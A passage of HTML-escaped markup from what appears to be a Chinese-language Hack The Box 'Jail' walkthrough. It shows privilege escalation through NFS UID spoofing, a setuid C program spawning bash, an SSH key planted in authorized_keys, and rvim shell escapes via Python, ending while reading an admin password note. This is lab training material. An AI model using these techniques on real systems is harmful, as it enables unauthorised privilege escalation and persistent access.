/post/hackbox/jail/image/image_Fzo7Ebs0iy_hu08887144fbf0555fd760baca000ab397_38568_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/jail/image/image_Fzo7Ebs0iy_hu08887144fbf0555fd760baca000ab397_38568_57c05944a79f3e345b1831bee5658a55.webp"
width="1073"
height="293"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>============================================================&lt;/p>
&lt;h3 id="正常提权">正常提权&lt;/h3>
&lt;p>SELinux&lt;/p>
&lt;p>一种嵌入linux内核的安全机制，目的是为了限制对文件和网络的策略访问，刚才curl超时可能和这个有关。&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">$ id
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="nv">uid&lt;/span>&lt;span class="o">=&lt;/span>99&lt;span class="o">(&lt;/span>nobody&lt;span class="o">)&lt;/span> &lt;span class="nv">gid&lt;/span>&lt;span class="o">=&lt;/span>99&lt;span class="o">(&lt;/span>nobody&lt;span class="o">)&lt;/span> &lt;span class="nv">groups&lt;/span>&lt;span class="o">=&lt;/span>99&lt;span class="o">(&lt;/span>nobody&lt;span class="o">)&lt;/span> &lt;span class="nv">context&lt;/span>&lt;span class="o">=&lt;/span>system_u:system_r:unconfined_service_t:s0
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1">#context的意思是当前是system权限，并且没有限制什么服务，意思是我可以做任何事情（这里指的是SELinux策略没有限制nobody这个用户）&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>&lt;a href="https://baike.baidu.com/item/SELinux/8865268?fr=aladdin" target="_blank" rel="noopener">https://baike.baidu.com/item/SELinux/8865268?fr=aladdin&lt;/a>&lt;/p>
&lt;h4 id="nobody提权到frank">nobody提权到frank&lt;/h4>
&lt;p>sudo -l&lt;/p>
&lt;p>&lt;code>nobody&lt;/code> 可以执行&lt;code>/opt/logreader/logreader.sh&lt;/code>，但是没权限看(后面回来看了也没什么信息)&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/jail/image/image_5BxDaKuPDd_hu71261ee7862160371023fd183c831e25_29351_5d73c830d4a15c267a0ba3b858cfeea3.webp 400w,
/post/hackbox/jail/image/image_5BxDaKuPDd_hu71261ee7862160371023fd183c831e25_29351_c5e1fe0ad83e8a9908f1c170d71bf548.webp 760w,
/post/hackbox/jail/image/image_5BxDaKuPDd_hu71261ee7862160371023fd183c831e25_29351_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/jail/image/image_5BxDaKuPDd_hu71261ee7862160371023fd183c831e25_29351_5d73c830d4a15c267a0ba3b858cfeea3.webp"
width="729"
height="222"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>根据nmap扫描出来的结果，2049端口是nfs服务&lt;/p>
&lt;p>&lt;code>showmount -e&lt;/code> 列出远程主机上的NFS共享目录&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/jail/image/image_JZjAx5yJvR_hu03941f988a41beb6127f8052dc9fc65b_3840_dff927845ee2639da6dfda1abf19ac93.webp 400w,
/post/hackbox/jail/image/image_JZjAx5yJvR_hu03941f988a41beb6127f8052dc9fc65b_3840_00cf97dd2cbf79e4878c0590d74c3bb3.webp 760w,
/post/hackbox/jail/image/image_JZjAx5yJvR_hu03941f988a41beb6127f8052dc9fc65b_3840_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/jail/image/image_JZjAx5yJvR_hu03941f988a41beb6127f8052dc9fc65b_3840_dff927845ee2639da6dfda1abf19ac93.webp"
width="376"
height="74"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>挂载之后发现什么也读不到，权限不够。并且&lt;code>nfsshare&lt;/code>的权限组居然变成&lt;code>kali&lt;/code>，&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/jail/image/image_rmfbqkywo__hu5dd4fe142857471925ecafb4495c47ed_34928_fb9bfe8464bf22fd69c7a5884a347f0c.webp 400w,
/post/hackbox/jail/image/image_rmfbqkywo__hu5dd4fe142857471925ecafb4495c47ed_34928_ab3586dde1ae41a399ef4f7e0c835763.webp 760w,
/post/hackbox/jail/image/image_rmfbqkywo__hu5dd4fe142857471925ecafb4495c47ed_34928_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/jail/image/image_rmfbqkywo__hu5dd4fe142857471925ecafb4495c47ed_34928_fb9bfe8464bf22fd69c7a5884a347f0c.webp"
width="565"
height="452"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>使用前面拿到的&lt;code>nobody shell&lt;/code>看一下nfs的配置文件/etc/exports&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">$ cat /etc/exports
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">/var/nfsshare *&lt;span class="o">(&lt;/span>rw,sync,root_squash,no_all_squash&lt;span class="o">)&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">/opt *&lt;span class="o">(&lt;/span>rw,sync,root_squash,no_all_squash&lt;span class="o">)&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>通过查看文档得知，NFS在提供服务时有一个用户映射的机制在里面，配置参数如下：&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">all_squash：所有访问用户都映射为匿名用户或用户组；
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">no_all_squash（默认）：访问用户先与本机用户匹配，匹配失败后再映射为匿名用户或用户组；
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>通过&lt;code>nobody shell&lt;/code> 发现&lt;code>frank&lt;/code> 用户组是&lt;code>1000&lt;/code>，本地用户和靶机&lt;code>frank&lt;/code>匹配失败，所以被映射为&lt;code>1000&lt;/code>用户组 ，然后我本地&lt;code>kali&lt;/code>的&lt;code>gid=1000&lt;/code>所以前面看到远程挂载的用户组是&lt;code>kali&lt;/code> &lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/jail/image/image_EZu11j5wFV_huec355855777f9b2831f6f704232ad906_3866_c4e8dc44488f65c48540a903299de75d.webp 400w,
/post/hackbox/jail/image/image_EZu11j5wFV_huec355855777f9b2831f6f704232ad906_3866_a5ae4e70a606cbe01589f318b95404fb.webp 760w,
/post/hackbox/jail/image/image_EZu11j5wFV_huec355855777f9b2831f6f704232ad906_3866_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/jail/image/image_EZu11j5wFV_huec355855777f9b2831f6f704232ad906_3866_c4e8dc44488f65c48540a903299de75d.webp"
width="455"
height="49"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>所以只要本地伪造一个用户&lt;code>frank&lt;/code>，权限也设置为&lt;code>frank❌1000:1000:frank&lt;/code>，这个账户就有权限访问&lt;code> /var/nfsshare&lt;/code> ，&lt;code>/opt&lt;/code>&lt;/p>
&lt;h4 id="伪造frank用户-访问nfs">伪造frank用户 访问nfs&lt;/h4>
&lt;p>我kali本地&lt;code>uid=1000&lt;/code>，要先将&lt;code>/etc/passwd&lt;/code>,&lt;code> /etc/group&lt;/code> 里kali的编号1000都改为1001，然后本地创建&lt;code>frank&lt;/code>&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">&lt;span class="c1">#-u 指定uid&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">useradd frank -u &lt;span class="m">1000&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/jail/image/image_4kAIP9NhHC_hu3f40e7b5a5c1b8376e82d288b4b5f1e3_5449_d7cb7ed932ee786f032db01e63ceff54.webp 400w,
/post/hackbox/jail/image/image_4kAIP9NhHC_hu3f40e7b5a5c1b8376e82d288b4b5f1e3_5449_8304d22c5b66e915eb2163a975bb4803.webp 760w,
/post/hackbox/jail/image/image_4kAIP9NhHC_hu3f40e7b5a5c1b8376e82d288b4b5f1e3_5449_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/jail/image/image_4kAIP9NhHC_hu3f40e7b5a5c1b8376e82d288b4b5f1e3_5449_d7cb7ed932ee786f032db01e63ceff54.webp"
width="432"
height="60"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>==========================================================&lt;/p>
&lt;p>后面测试发现nfs只匹配uid和gid，用户名不是frank也行，kali本身uid=1000的话就不用创建个新的账号这么麻烦了&lt;/p>
&lt;p>==========================================================&lt;/p>
&lt;p>重新挂载&lt;code>/var/nfsshare&lt;/code>&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">mkdir -p /mnt/nfsshare
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">chmod &lt;span class="m">777&lt;/span> /mnt/nfsshare &lt;span class="c1">#不加的话frank没权限&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1">#-o tcp 不加的话很卡&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">mount -t nfs -o tcp 10.10.10.34:/var/nfsshare/ /mnt/nfsshare/
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>现在用户组识别为&lt;code>frank&lt;/code>&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/jail/image/image_DvSjuGSfku_hu6bedf07da720440a9980d07b551b0c84_7251_7096e52d8b3eced6cba0e64e49e9b0e5.webp 400w,
/post/hackbox/jail/image/image_DvSjuGSfku_hu6bedf07da720440a9980d07b551b0c84_7251_004a8d62241c4c86ade8a37e60cfc727.webp 760w,
/post/hackbox/jail/image/image_DvSjuGSfku_hu6bedf07da720440a9980d07b551b0c84_7251_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/jail/image/image_DvSjuGSfku_hu6bedf07da720440a9980d07b551b0c84_7251_7096e52d8b3eced6cba0e64e49e9b0e5.webp"
width="451"
height="86"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>nfs挂载服务无法直接执行&lt;code>bash shell&lt;/code>远程弹回来, 但是可以将编译好的&lt;code>bash shell&lt;/code>程序通过nfs服务上传到远程服务器，然后再添加&lt;code>suid&lt;/code>，再通过靶机上&lt;code>nobody&lt;/code> 执行上传的&lt;code>bash shell&lt;/code>&lt;/p>
&lt;p>因为设置了&lt;code>suid&lt;/code>位的进程在执行的时候，拥有的权限是进程本身的属主权限，而不是执行的发起者&lt;/p>
&lt;p>，在执行过程中，调用者会暂时获得该文件的所有者权限&lt;/p>
&lt;p>意思就是&lt;code>uid_1000_sh&lt;/code> 的文件所有者是&lt;code>frank&lt;/code> ，当&lt;code>uid_1000_sh&lt;/code>设置了&lt;code>suid&lt;/code>位，用&lt;code>nobody&lt;/code> 去执行&lt;code>uid_1000_sh&lt;/code> 的时候，&lt;code>uid_1000_sh&lt;/code> 会以&lt;code>frank&lt;/code> 权限被执行，这样就可以导致提权。&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">frank@kali:/tmp$ cat uid_1000_bash.c
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1">#define _GNU_SOURCE&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1">#include &amp;lt;stdlib.h&amp;gt;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1">#include &amp;lt;unistd.h&amp;gt;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">int main&lt;span class="o">(&lt;/span>void&lt;span class="o">)&lt;/span> &lt;span class="o">{&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> setresuid&lt;span class="o">(&lt;/span>1000, 1000, 1000&lt;span class="o">)&lt;/span>&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> system&lt;span class="o">(&lt;/span>&lt;span class="s2">&amp;#34;/bin/bash&amp;#34;&lt;/span>&lt;span class="o">)&lt;/span>&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="k">return&lt;/span> 0&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="o">}&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">frank@kali:/tmp$ gcc -m32 uid_1000_bash.c -o /mnt/nfsshare/uid_1000_bash
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">frank@kali:/tmp$ chmod &lt;span class="m">7777&lt;/span> /mnt/nfsshare/uid_1000_bash
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>&lt;code>nobody&lt;/code> 上执行后成功提权到&lt;code>frank&lt;/code>&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">script /dev/null
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">/var/nfsshare/uid_1000_bash
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/jail/image/image_N7Emp2uN6G_hu547e6c470a8b28585f1b8f21e85321b8_24676_a2167022cdcb77346e225dcbf1dac035.webp 400w,
/post/hackbox/jail/image/image_N7Emp2uN6G_hu547e6c470a8b28585f1b8f21e85321b8_24676_d48773384c953a5e0ea9d2d51cad67e8.webp 760w,
/post/hackbox/jail/image/image_N7Emp2uN6G_hu547e6c470a8b28585f1b8f21e85321b8_24676_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/jail/image/image_N7Emp2uN6G_hu547e6c470a8b28585f1b8f21e85321b8_24676_a2167022cdcb77346e225dcbf1dac035.webp"
width="821"
height="198"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>这个shell不稳定，写个公钥用ssh连接&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/jail/image/image_XBumleRusl_hu33becb7772058bc94f97ee386543d92d_70995_95b31d72d663825728dc2f272f8f3ec4.webp 400w,
/post/hackbox/jail/image/image_XBumleRusl_hu33becb7772058bc94f97ee386543d92d_70995_0d8607d761998aca14e346db2d04b7af.webp 760w,
/post/hackbox/jail/image/image_XBumleRusl_hu33becb7772058bc94f97ee386543d92d_70995_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/jail/image/image_XBumleRusl_hu33becb7772058bc94f97ee386543d92d_70995_95b31d72d663825728dc2f272f8f3ec4.webp"
width="1260"
height="544"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">&lt;span class="o">[&lt;/span>frank@localhost .ssh&lt;span class="o">]&lt;/span>$ $ &lt;span class="nb">echo&lt;/span> &lt;span class="s1">&amp;#39;ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDRKFfz2jS4mH1HmJMOhxCg0B/BbBLc4iDMYeR6wG1BKUeospV8EBwNnBDH+Qvg47XBBxhkjZGZToEELQ8ZFBeg7r75pSBkwxAaVG/sC9T8TEwqdr6a/G935eZXBFSzmuhV3sTlcKfMgb4tM5xdgNqRWcoCo3dwiYfya/6Bs6/1TEAmqWotGRjObhgcy95z8uObRmlvimEcLpdhUTJt10+2w63givJlP7OBOsFI4H4N4gMsh1NYQwyR2oUGYyc3suqkqnjDyzQ+7ezoje2sQr1Bg7AQqsI8YTh8ePElSTBEXc2/0WouqhwJ5jKMQP2jzGPF2RmKg9XghoIVQGdUBdh7998ABKyHdjJdWxk3ekNZoxnXp9tBlgVd2OQ8jUHW/sHi0anUwKY4ZhZ6SbJtOPJIm967oR5gLAUjPzVVYMHGSYajy1sJNXAYa9L/ro9F75O7H1cxZuWk7c6wUvJORB3tKovLr9gzKpshTXMDwIna9QzZcTkPBuNzpKVUJ2MHrGc= root@kali&amp;#39;&lt;/span> &amp;gt;&amp;gt; /home/frank/.ssh/authorized_keys
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>登录&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">ssh -i /root/.ssh/id_rsa frank@10.10.10.34
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/jail/image/image_U1_rcSxcVl_hu090d7e6d3c2b8b2191adfb6ea6c36cfe_31916_4cb6c1ce629281851c84a363f0676902.webp 400w,
/post/hackbox/jail/image/image_U1_rcSxcVl_hu090d7e6d3c2b8b2191adfb6ea6c36cfe_31916_88b9d647c22b1c4a9f992fc5a07b153e.webp 760w,
/post/hackbox/jail/image/image_U1_rcSxcVl_hu090d7e6d3c2b8b2191adfb6ea6c36cfe_31916_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/jail/image/image_U1_rcSxcVl_hu090d7e6d3c2b8b2191adfb6ea6c36cfe_31916_4cb6c1ce629281851c84a363f0676902.webp"
width="875"
height="206"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;h4 id="frank提权到adm">frank提权到adm&lt;/h4>
&lt;p>sudo -l&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/jail/image/image_wf2KxFoRRW_huc52cf7e73e7fa60c09560c8d999dd7f2_36194_a8053c1a4f179ad781096271e6a07b2d.webp 400w,
/post/hackbox/jail/image/image_wf2KxFoRRW_huc52cf7e73e7fa60c09560c8d999dd7f2_36194_12f1228993ef244b2fc2e3f086cda187.webp 760w,
/post/hackbox/jail/image/image_wf2KxFoRRW_huc52cf7e73e7fa60c09560c8d999dd7f2_36194_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/jail/image/image_wf2KxFoRRW_huc52cf7e73e7fa60c09560c8d999dd7f2_36194_a8053c1a4f179ad781096271e6a07b2d.webp"
width="1236"
height="208"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>&lt;code>frank&lt;/code>可以以&lt;code>adm&lt;/code>身份运行&lt;code>rvim&lt;/code>，rvim是vim的一种&lt;/p>
&lt;p>&lt;a href="https://linux.die.net/man/1/rvim" target="_blank" rel="noopener">https://linux.die.net/man/1/rvim&lt;/a>&lt;/p>
&lt;p>命令写死了，参数无法注入&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">sudo -u adm /usr/bin/rvim /var/www/html/jailuser/dev/jail.c
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>执行后进入文本编辑模式，常规&lt;code>vim&lt;/code>可以在&lt;code>末行模式&lt;/code>下输入&lt;code>:![command]&lt;/code> 执行命令&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/jail/image/image__zx51t50Z9_hu8c2b952d9e328d3c20df73df91c901f8_4892_61837534dedea4408e4b50ec3cffbf7a.webp 400w,
/post/hackbox/jail/image/image__zx51t50Z9_hu8c2b952d9e328d3c20df73df91c901f8_4892_5bd14944dcaa4bdf1643503cacc19fd9.webp 760w,
/post/hackbox/jail/image/image__zx51t50Z9_hu8c2b952d9e328d3c20df73df91c901f8_4892_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/jail/image/image__zx51t50Z9_hu8c2b952d9e328d3c20df73df91c901f8_4892_61837534dedea4408e4b50ec3cffbf7a.webp"
width="439"
height="65"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>但是rvim禁止执行shell命令&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/jail/image/image_yLPSpB0K7n_hu027e6c2ae835a37e24c05c60a5c18256_5404_41be7c3692990d5707070d124ce0511b.webp 400w,
/post/hackbox/jail/image/image_yLPSpB0K7n_hu027e6c2ae835a37e24c05c60a5c18256_5404_a57f2b7f6616cbc9231b224aa132d770.webp 760w,
/post/hackbox/jail/image/image_yLPSpB0K7n_hu027e6c2ae835a37e24c05c60a5c18256_5404_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/jail/image/image_yLPSpB0K7n_hu027e6c2ae835a37e24c05c60a5c18256_5404_41be7c3692990d5707070d124ce0511b.webp"
width="403"
height="51"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>但是有绕过的方式&lt;/p>
&lt;p>&lt;a href="https://gtfobins.github.io/" target="_blank" rel="noopener">https://gtfobins.github.io/&lt;/a>&lt;/p>
&lt;p>末行模式下输入：&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">&lt;span class="c1">#方法一&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">:py import os&lt;span class="p">;&lt;/span> os.execl&lt;span class="o">(&lt;/span>&lt;span class="s2">&amp;#34;/bin/sh&amp;#34;&lt;/span>, &lt;span class="s2">&amp;#34;sh&amp;#34;&lt;/span>, &lt;span class="s2">&amp;#34;-c&amp;#34;&lt;/span>, &lt;span class="s2">&amp;#34;reset; exec sh&amp;#34;&lt;/span>&lt;span class="o">)&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1">#方法二&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">:python import pty&lt;span class="p">;&lt;/span> pty.spawn&lt;span class="o">(&lt;/span>&lt;span class="s2">&amp;#34;/bin/bash&amp;#34;&lt;/span>&lt;span class="o">)&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/jail/image/image_NstuSv2_jR_hu5be892c3d157355a0e93572e8b8b6014_10551_a6e3aa2aa5e87dd0e9e87ce56c30c8c0.webp 400w,
/post/hackbox/jail/image/image_NstuSv2_jR_hu5be892c3d157355a0e93572e8b8b6014_10551_1ae92816baeb3e5071baf9c898517c5a.webp 760w,
/post/hackbox/jail/image/image_NstuSv2_jR_hu5be892c3d157355a0e93572e8b8b6014_10551_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/jail/image/image_NstuSv2_jR_hu5be892c3d157355a0e93572e8b8b6014_10551_a6e3aa2aa5e87dd0e9e87ce56c30c8c0.webp"
width="401"
height="140"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>确认后即可获得&lt;code>adm shell&lt;/code>&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/jail/image/image_hjBSJ_ps0o_huc5925fd73bd2616c76c489fc708f98da_15326_bec2692a5b802adaf486d8d0f25dedeb.webp 400w,
/post/hackbox/jail/image/image_hjBSJ_ps0o_huc5925fd73bd2616c76c489fc708f98da_15326_1e022e7248d22b661d9163b55a7b4504.webp 760w,
/post/hackbox/jail/image/image_hjBSJ_ps0o_huc5925fd73bd2616c76c489fc708f98da_15326_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/jail/image/image_hjBSJ_ps0o_huc5925fd73bd2616c76c489fc708f98da_15326_bec2692a5b802adaf486d8d0f25dedeb.webp"
width="761"
height="152"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;h4 id="adm提权到root">adm提权到root&lt;/h4>
&lt;p>adm没有运行任何进程，只能查找和adm有关的文件&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">find / -group adm 2&amp;gt;/dev/null &lt;span class="p">|&lt;/span> grep -v -e ^/proc
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/jail/image/image_R3OfbG6W4I_hu707ef1b1693ee1f0aefd6da5f54d5fc9_19469_2978b8bdd07c2bfda99bcef5ec7cd0cc.webp 400w,
/post/hackbox/jail/image/image_R3OfbG6W4I_hu707ef1b1693ee1f0aefd6da5f54d5fc9_19469_2eb2f18cab03b321111f7563516674c5.webp 760w,
/post/hackbox/jail/image/image_R3OfbG6W4I_hu707ef1b1693ee1f0aefd6da5f54d5fc9_19469_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/jail/image/image_R3OfbG6W4I_hu707ef1b1693ee1f0aefd6da5f54d5fc9_19469_2978b8bdd07c2bfda99bcef5ec7cd0cc.webp"
width="667"
height="226"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>排除下来只有三个文件&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">/var/adm/.keys/note.txt
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">/var/adm/.keys/.local/.frank
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">/var/adm/.keys/keys.rar
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;h4 id="下面的扯淡的社工解密时间">下面的扯淡的社工解密时间&lt;/h4>
&lt;p>==========================================================&lt;/p>
&lt;p>note.txt&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">Note from Administrator:
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">Frank, &lt;span class="k">for&lt;/span> the last time, your password &lt;span class="k">for&lt;/span> anything encrypted must be your last name followed by a &lt;span class="m">4&lt;/span> digit number and a symbol.
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1">#翻译&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">来自管理员的注释：
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">弗兰克，最后一次，您的任何加密密码都必须是您的姓氏，后跟一个 &lt;span class="m">4&lt;/span> 位数字和一个符号。
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>.frank &lt;/p>
